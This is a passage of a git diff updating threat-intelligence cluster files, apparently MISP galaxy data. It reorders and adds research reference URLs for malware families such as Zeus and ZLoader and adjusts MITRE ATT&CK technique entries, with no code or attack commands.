+ "https://www.pcrisk.com/removal-guides/16844-harma-ouroboros-ransomware"
+ ],
+ "synonyms": [
+ "Ouroboros"
+ ],
+ "type": []
+ },
+ "uuid": "b8f99ed3-5669-4c71-b217-e92659a6e6bd",
+ "value": "Zeropadypt"
+ },
{
"description": "",
"meta": {
@@ -49218,15 +51854,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ff00fa92-b32e-46b6-88ca-98357ebe3f54",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c",
"value": "ZeroT"
},
@@ -49235,59 +51862,52 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
- "http://eternal-todo.com/blog/detecting-zeus",
- "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
- "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
- "https://www.mnin.org/write/ZeusMalware.pdf",
- "https://www.secureworks.com/research/zeus?threat=zeus",
- "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "http://eternal-todo.com/blog/new-zeus-binary",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
- "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
- "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
- "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
"http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
"https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "http://eternal-todo.com/blog/detecting-zeus",
"https://www.s21sec.com/en/zeus-the-missing-link/",
+ "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
+ "https://www.secureworks.com/research/zeus?threat=zeus",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
"http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
+ "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
+ "https://www.mnin.org/write/ZeusMalware.pdf",
+ "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
+ "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html",
+ "https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
+ "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
+ "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/",
+ "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
"http://eternal-todo.com/blog/zeus-spreading-facebook",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
"http://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf"
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "http://eternal-todo.com/blog/new-zeus-binary",
+ "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"Zbot"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "0ce448de-c2bb-4c6e-9ad7-c4030f02b4d7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a",
"value": "Zeus"
},
@@ -49296,8 +51916,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://twitter.com/benkow_/status/1136983062699487232"
+ "https://twitter.com/benkow_/status/1136983062699487232",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI"
],
"synonyms": [],
"type": []
@@ -49339,9 +51959,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx",
- "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html",
"https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
- "https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/"
+ "https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/",
+ "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html"
],
"synonyms": [],
"type": []
@@ -49407,7 +52027,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zingo_stealer",
- "https://blogs.blackberry.com/en/2022/05/threat-thursday-zingostealer"
+ "https://blogs.blackberry.com/en/2022/05/threat-thursday-zingostealer",
+ "https://blog.talosintelligence.com/haskers-gang-zingostealer/"
],
"synonyms": [
"Ginzo"
@@ -49451,86 +52072,88 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader",
- "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit",
- "https://blog.alyac.co.kr/3322",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf",
- "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
- "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1",
- "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/",
- "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.youtube.com/watch?v=mhX-UoaYnOM",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
- "https://www.youtube.com/watch?v=QBoj6GB79wM",
- "https://twitter.com/VK_Intel/status/1294320579311435776",
- "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns",
"https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/",
- "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html",
- "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt",
- "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
- "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
- "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
- "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
"https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/",
- "https://noticeofpleadings.com/zloader/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
- "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/",
- "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
+ "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/",
+ "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
+ "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit",
"https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://johannesbader.ch/blog/the-dga-of-zloader/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/",
+ "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
+ "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://noticeofpleadings.com/zloader/",
+ "https://labs.k7computing.com/?p=22458",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blogs.quickheal.com/zloader-entailing-different-office-files/",
+ "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
+ "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware",
+ "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/",
+ "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/",
"https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
+ "https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader",
+ "https://blog.alyac.co.kr/3322",
+ "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance",
"https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
- "https://labs.k7computing.com/?p=22458",
- "https://blogs.quickheal.com/zloader-entailing-different-office-files/",
- "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
- "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/",
- "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader",
- "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
- "https://twitter.com/ffforward/status/1324281530026524672",
- "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/",
+ "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns",
+ "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
+ "https://twitter.com/VK_Intel/status/1294320579311435776",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
"https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/",
- "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/",
- "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/"
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://www.youtube.com/watch?v=QBoj6GB79wM",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html",
+ "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
+ "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
+ "https://johannesbader.ch/blog/the-dga-of-zloader/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/",
+ "https://www.youtube.com/watch?v=mhX-UoaYnOM",
+ "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
+ "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/",
+ "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
+ "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/",
+ "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
+ "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex"
],
"synonyms": [
"DELoader",
@@ -49546,8 +52169,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob",
- "https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/",
- "https://en.wikipedia.org/wiki/Zlob_trojan"
+ "https://en.wikipedia.org/wiki/Zlob_trojan",
+ "https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/"
],
"synonyms": [],
"type": []
@@ -49576,8 +52199,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek",
- "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/",
- "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/"
+ "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/",
+ "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/"
],
"synonyms": [],
"type": []
@@ -49619,37 +52242,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://risky.biz/whatiswinnti/",
- "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw",
- "https://attack.mitre.org/groups/G0001/",
- "https://blogs.cisco.com/security/talos/opening-zxshell",
- "https://lab52.io/blog/apt27-rootkit-updates/",
- "https://attack.mitre.org/groups/G0096",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
- "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html",
"https://content.fireeye.com/apt-41/rpt-apt41",
+ "https://attack.mitre.org/groups/G0096",
+ "https://lab52.io/blog/apt27-rootkit-updates/",
+ "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html",
+ "https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw",
+ "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://github.com/smb01/zxshell",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf"
+ "https://blogs.cisco.com/security/talos/opening-zxshell",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
+ "https://risky.biz/whatiswinnti/"
],
"synonyms": [
"Sensocode"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "5b9dc67e-bae4-44f3-b58d-6d842a744104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15",
"value": "ZXShell"
},
@@ -49658,8 +52272,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz",
- "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html"
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
+ "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/"
],
"synonyms": [
"MuuyDownloader"
@@ -49684,5 +52298,5 @@
"value": "Zyklon"
}
],
- "version": 15976
+ "version": 17779
}
diff --git a/clusters/mitre-attack-pattern.json b/clusters/mitre-attack-pattern.json
index d035b35..ca66d8d 100644
--- a/clusters/mitre-attack-pattern.json
+++ b/clusters/mitre-attack-pattern.json
@@ -639,7 +639,6 @@
"http://msdn.microsoft.com/en-us/library/aa376977",
"https://attack.mitre.org/techniques/T1547/001",
"https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/",
- "https://capec.mitre.org/data/definitions/270.html",
"https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry",
"https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
"https://technet.microsoft.com/en-us/sysinternals/bb963902"
@@ -834,9 +833,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1574/007",
- "https://capec.mitre.org/data/definitions/13.html",
- "https://capec.mitre.org/data/definitions/38.html"
+ "https://attack.mitre.org/techniques/T1574/007"
]
},
"related": [
@@ -869,7 +866,6 @@
"http://msdn.microsoft.com/en-us/library/ms682425",
"http://msdn.microsoft.com/en-us/library/ms687393",
"https://attack.mitre.org/techniques/T1574/008",
- "https://capec.mitre.org/data/definitions/159.html",
"https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120",
"https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN"
]
@@ -1457,7 +1453,7 @@
"value": "LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"
},
{
- "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
+ "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
"meta": {
"external_id": "T1048.003",
"kill_chain": [
@@ -1473,11 +1469,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
